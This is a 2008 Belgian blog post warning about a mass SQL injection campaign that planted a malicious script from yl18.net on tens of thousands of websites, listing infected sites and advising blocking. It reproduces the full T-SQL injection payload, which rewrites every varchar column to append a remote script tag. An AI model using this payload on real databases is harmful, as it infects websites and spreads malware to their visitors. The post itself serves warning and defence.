08-11-07

also belgian sites infected with virus after hack

According to the Internet Storm center (the thing that our politicians don't want to set up in Belgian even if they agreed to put into the Telecom law - it is much more important to squabble about BHV while your critical communication infrastructure is being attacked inside out without having the capabilities to respond effectively) there is an important and dangereous infection and password stealing script being placed on more than 40.000 websites already. They are busy trying to mobilise everybody to clean it up, but I think you should do also your own part and protect your network and your server.

First you should block at your firewall and all other filters every connection to 18.net/0.js  Do not hesitate to do this. It is absolutely necessary.

Secondly if you have a website, the attacks will for the moment use an SQL injection and this is the attack code

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

and this on as many pages of the website as it can find

The internet storm center calls on all ISP's to take out and clean up websites that are hijacked - injected with this code. In Belgium a simple Google trick already showed some Belgian sites being infected. DO NOT VISIT THEM.

Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js ...- [ Traduire cette page ] www.futurestep.be/ - 48k -

KornFerry Overview<script src=<script src="http://yl18.net/0.js ...-

and the whole

[ Traduire cette page ]


www.kornferry.com/

If you have a forum you should block all the script possibilities otherwise you will infect your users

Student Psychology - Research method presentation<script src="http ...- [ Traduire cette page ]

Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic · Reply to
www.psypress.com/student/forum/topic.asp?TOPIC_ID=69 - 14k

It is even being introduced as additional newspage on news sites as here and look at the name of the page

Technology Group International<script src="http://yl18.net/0.js ...- [ Traduire cette page ]

The newest version of Enterprise 21 offers significant enhancements designed to improve

www.manubiz.com/channel/news.asp?news=H4ED8KE9 - 4k -

And it are domains from all over the world that are being attacked,

from tn (tunesia) to uk to org to com and so on

a google for the script shows 50.000 pages, this is already more than 10.000 new pages

since the Internet storm center launched its alert

I think this will be spreading even more and it seems that antiviruses aren't very effective for now

and if thought that professional sites had professional security, think again

Organon International Inc. Profile- [ Traduire cette page ]

LEUVEN, Belgium, January 15 /PRNewswire/ --  "http://yl18.net/0.js">. Website:, http://www.organon.com ...
www.smartbrief.com/news/AABB/companyData.jsp?companyId=18199 - 47k -
  

I am sure that the Internet storm center will follow up on the story

http://www.incidents.org/diary.html?storyid=3621 

we will also

 

 

 

00:45 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

De commentaren zijn gesloten.